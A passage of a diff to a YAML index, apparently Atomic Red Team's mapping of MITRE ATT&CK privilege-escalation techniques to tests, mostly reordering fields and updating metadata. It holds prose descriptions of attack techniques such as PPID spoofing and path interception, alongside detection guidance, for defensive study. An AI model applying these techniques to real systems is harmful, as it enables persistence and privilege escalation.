- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Authentication logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: Perform regular audits of local system accounts to detect
accounts that may have been created by an adversary for persistence. Look
for suspicious account behavior, such as accounts logged in at odd times or
outside of business hours.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1037.002:
technique:
@@ -3851,18 +3953,18 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-27T16:49:15.786Z'
created: '2020-01-10T16:01:15.995Z'
- x_mitre_platforms:
- - macOS
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
or at abnormal times. Look for files added or modified by unusual accounts
outside of normal administration duties. Monitor running process for actions
that could be indicative of abnormal programs or executables running upon
logon.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - macOS
identifier: T1037.002
atomic_tests:
- name: Logon Scripts - Mac
@@ -3916,17 +4018,17 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-24T23:45:03.153Z'
created: '2020-01-10T03:43:37.211Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_data_sources:
+ - Process monitoring
+ - Windows Registry
x_mitre_detection: |-
Monitor for changes to Registry values associated with Windows logon scrips, nameley HKCU\Environment\UserInitMprLogonScript.
Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.
- x_mitre_data_sources:
- - Process monitoring
- - Windows Registry
- x_mitre_platforms:
- - Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1037.001
atomic_tests:
- name: Logon Scripts
@@ -3983,30 +4085,30 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-02-18T18:03:37.481Z'
created: '2020-02-18T18:03:37.481Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - Access tokens
- - API monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_defense_bypassed:
+ - Windows User Account Control
+ - System access controls
+ - File system access controls
x_mitre_detection: |-
If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)
If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.
Analysts can also monitor for use of Windows APIs such as LogonUser and SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.
- x_mitre_defense_bypassed:
- - Windows User Account Control
- - System access controls
- - File system access controls
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_effective_permissions:
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - Access tokens
+ - API monitoring
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1546.007:
technique:
@@ -4042,25 +4144,25 @@ privilege-escalation:
phase_name: persistence
modified: '2020-03-24T18:28:07.793Z'
created: '2020-01-24T14:26:51.207Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Matthew Demaske, Adaptforward
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - Windows Registry
- - DLL monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
in most environments. Monitor process executions and investigate any child
processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\SOFTWARE\Microsoft\Netsh
registry key for any new or suspicious entries that do not correlate with
known system files or benign software. (Citation: Demaske Netsh Persistence)'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - Windows Registry
+ - DLL monitoring
+ x_mitre_contributors:
+ - Matthew Demaske, Adaptforward
+ x_mitre_platforms:
+ - Windows
identifier: T1546.007
atomic_tests:
- name: Netsh Helper DLL Registration
@@ -4114,18 +4216,18 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-24T23:45:25.625Z'
created: '2020-01-10T18:01:03.666Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
or at abnormal times. Look for files added or modified by unusual accounts
outside of normal administration duties. Monitor running process for actions
that could be indicative of abnormal programs or executables running upon
logon.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1134.004:
technique:
@@ -4154,10 +4256,10 @@ privilege-escalation:
url: https://blog.xpnsec.com/becoming-system/
description: Chester, A. (2017, November 20). Alternative methods of becoming
SYSTEM. Retrieved June 4, 2019.
- - description: Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags.
- Retrieved June 4, 2019.
+ - source_name: Microsoft Process Creation Flags May 2018
url: https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags
- source_name: Microsoft Process Creation Flags May 2018
+ description: Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags.
+ Retrieved June 4, 2019.
- description: Secuirtyinbits . (2019, May 14). Parent PID Spoofing (Stage 2)
Ataware Ransomware Part 3. Retrieved June 6, 2019.
url: https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3
@@ -4169,7 +4271,7 @@ privilege-escalation:
description: |-
Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018)
- Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [VBScript](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
+ Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
id: attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a
@@ -4179,28 +4281,28 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T21:45:30.415Z'
+ modified: '2020-04-16T19:37:02.030Z'
created: '2020-02-18T18:22:41.448Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - API monitoring
- - Process monitoring
- - Windows event logs
+ x_mitre_contributors:
+ - Wayne Silva, F-Secure Countercept
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_defense_bypassed:
+ - Heuristic Detection
+ - Host forensic analysis
x_mitre_detection: |-
Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018)
Monitor and analyze API calls to CreateProcess/CreateProcessA, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of CreateProcess/CreateProcessA may also be proceeded by a call to UpdateProcThreadAttribute, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.
- x_mitre_defense_bypassed:
- - Heuristic Detection
- - Host forensic analysis
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Wayne Silva, Countercept
+ x_mitre_data_sources:
+ - API monitoring
+ - Process monitoring
+ - Windows event logs
+ x_mitre_platforms:
+ - Windows
identifier: T1134.004
atomic_tests:
- name: Parent PID Spoofing using PowerShell
@@ -4256,7 +4358,7 @@ privilege-escalation:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Path Interception
description: |-
- **This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).**
+ **This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).**
Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019)
@@ -4326,15 +4428,19 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-30T13:45:24.192Z'
+ modified: '2020-07-06T18:49:35.645Z'
created: '2017-05-31T21:30:36.140Z'
- x_mitre_deprecated: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- x_mitre_contributors:
- - Stefan Kanthak
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_effective_permissions:
+ - User
+ - Administrator
+ - SYSTEM
x_mitre_detection: "Monitor file creation for files named after partial directories
and in locations that may be searched for common processes through the environment
variable, or otherwise should not be user writable. Monitor the executing
@@ -4347,20 +4453,27 @@ privilege-escalation:
that could lead to other activities, such as network connections made for
Command and Control, learning details about the environment through Discovery,
and Lateral Movement."
- x_mitre_effective_permissions:
- - User
- - Administrator
- - SYSTEM
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Stefan Kanthak
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_deprecated: true
atomic_tests: []
T1574.007:
technique:
+ id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
+ description: |-
+ Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.
+
+ The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
+
+ For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line.
+ name: Path Interception by PATH Environment Variable
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1574.007
@@ -4368,17 +4481,6 @@ privilege-escalation:
- external_id: CAPEC-capec
source_name: capec
url: https://capec.mitre.org/data/definitions/capec.html
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Path Interception by PATH Environment Variable
- description: |-
- Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.
-
- The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
-
- For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line.
- id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -4387,7 +4489,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T19:59:42.456Z'
+ modified: '2020-06-20T22:02:40.983Z'
created: '2020-03-13T14:10:43.424Z'
x_mitre_platforms:
- Windows
@@ -4403,10 +4505,33 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_defense_bypassed:
- - Process whitelisting
+ - Application control
atomic_tests: []
T1574.008:
technique:
+ created: '2020-03-13T17:48:58.999Z'
+ modified: '2020-03-26T20:03:27.496Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
+ description: |-
+ Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
+
+ Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
+
+ For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)
+
+ Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
+ name: Path Interception by Search Order Hijacking
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1574.008
@@ -4429,29 +4554,6 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
description: Microsoft. (2011, October 24). Environment Property. Retrieved
July 27, 2016.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Path Interception by Search Order Hijacking
- description: |-
- Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
-
- Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
-
- For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)
-
- Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
- id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-26T20:03:27.496Z'
- created: '2020-03-13T17:48:58.999Z'
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -4476,17 +4578,16 @@ privilege-escalation:
atomic_tests: []
T1574.009:
technique:
- id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b
- description: |-
- Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
-
- Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)
-
- This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
- name: Path Interception by Unquoted Path
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2020-03-13T13:51:58.519Z'
+ modified: '2020-03-26T19:55:39.867Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
external_references:
- source_name: mitre-attack
external_id: T1574.009
@@ -4510,16 +4611,17 @@ privilege-escalation:
url: https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
description: absolomb. (2018, January 26). Windows Privilege Escalation Guide.
Retrieved August 10, 2018.
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-26T19:55:39.867Z'
- created: '2020-03-13T13:51:58.519Z'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Path Interception by Unquoted Path
+ description: |-
+ Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
+
+ Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)
+
+ This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
+ id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b
x_mitre_version: '1.0'
x_mitre_is_subtechnique: true
x_mitre_detection: |-
@@ -4565,6 +4667,14 @@ privilege-escalation:
elevation_required: true
T1547.011:
technique:
+ created: '2020-01-24T20:02:59.149Z'
+ modified: '2020-06-20T19:57:36.136Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
id: attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a
description: "Adversaries may modify plist files to run a program during system
boot or user login. Property list (plist) files contain all of the information
@@ -4621,31 +4731,23 @@ privilege-escalation:
description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web
traffic. Retrieved July 10, 2017.
source_name: OSX.Dok Malware
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-25T19:47:38.978Z'
- created: '2020-01-24T20:02:59.149Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_detection: |-
- File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like "Knock Knock" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed.
-
- All the login items created via shared file lists are viewable by going to the Apple menu -> System Preferences -> Users & Groups -> Login items. This area (and the corresponding file locations) should be monitored and whitelisted for known good applications. Otherwise, Login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items)
-
- Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.
+ x_mitre_platforms:
+ - macOS
x_mitre_data_sources:
- File monitoring
- Process monitoring
- Process command-line parameters
- x_mitre_platforms:
- - macOS
+ x_mitre_detection: |-
+ File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like "Knock Knock" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed.
+
+ All the login items created via shared file lists are viewable by going to the Apple menu -> System Preferences -> Users & Groups -> Login items. This area (and the corresponding file locations) should be monitored and allowed for known good applications. Otherwise, Login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items)
+
+ Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1547.011
atomic_tests:
- name: Plist Modification
@@ -4710,17 +4812,13 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-01-24T19:46:27.750Z'
created: '2020-01-24T19:46:27.750Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Stefan Kanthak
- - Travis Smith, Tripwire
- x_mitre_data_sources:
- - File monitoring
- - API monitoring
- - DLL monitoring
- - Windows Registry
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ x_mitre_permissions_required:
+ - SYSTEM
+ - Administrator
x_mitre_detection: "Monitor process API calls to AddMonitor.(Citation:
AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are
abnormal. New DLLs written to the System32 directory that do not correlate
@@ -4728,13 +4826,17 @@ privilege-escalation:
writes to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors.
Run the Autoruns utility, which checks for this Registry key as a persistence
mechanism (Citation: TechNet Autoruns)"
- x_mitre_permissions_required:
- - SYSTEM
- - Administrator
- x_mitre_effective_permissions:
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - API monitoring
+ - DLL monitoring
+ - Windows Registry
+ - Process monitoring
+ x_mitre_contributors:
+ - Stefan Kanthak
+ - Travis Smith, Tripwire
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1055.002:
technique:
@@ -4772,12 +4874,16 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-02-21T22:34:26.937Z'
+ modified: '2020-06-20T22:19:58.813Z'
created: '2020-01-14T01:27:31.344Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_data_sources:
+ - Process monitoring
+ - API monitoring
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -4789,14 +4895,10 @@ privilege-escalation:
process behavior to determine if a process is performing actions it usually
does not, such as opening network connections, reading files, or other suspicious
actions that could relate to post-compromise behavior. "
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Process monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1546.013:
technique:
@@ -4850,15 +4952,11 @@ privilege-escalation:
phase_name: persistence
modified: '2020-03-24T21:31:31.082Z'
created: '2020-01-24T15:11:02.758Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Allen DeRyke, ICE
- x_mitre_data_sources:
- - PowerShell logs
- - File monitoring
- - Process command-line parameters
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
x_mitre_detection: |-
Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:
@@ -4868,11 +4966,15 @@ privilege-escalation:
* $Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1
Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - PowerShell logs
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_contributors:
+ - Allen DeRyke, ICE
+ x_mitre_platforms:
+ - Windows
identifier: T1546.013
atomic_tests:
- name: Append malicious start-process cmdlet
@@ -4909,7 +5011,26 @@ privilege-escalation:
name: powershell
T1055.009:
technique:
- id: attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1055.009
+ url: https://attack.mitre.org/techniques/T1055/009
+ - url: http://hick.org/code/skape/papers/needle.txt
+ description: skape. (2003, January 19). Linux x86 run-time process manipulation.
